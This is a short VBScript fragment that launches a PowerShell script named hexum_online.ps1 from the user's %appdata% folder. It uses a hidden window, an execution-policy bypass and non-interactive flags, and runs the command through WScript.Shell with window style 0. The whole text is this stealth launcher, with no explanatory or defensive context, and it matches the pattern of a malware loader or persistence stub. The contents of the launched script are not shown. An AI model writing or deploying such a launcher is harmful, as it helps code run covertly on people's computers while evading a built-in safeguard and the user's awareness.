command = "powershell.exe -WindowStyle hidden -ExecutionPolicy bypass -NonInteractive -nologo -command %appdata%\hexum_online.ps1"
set Shell = CreateObject("WScript.Shell")
shell.Run command,0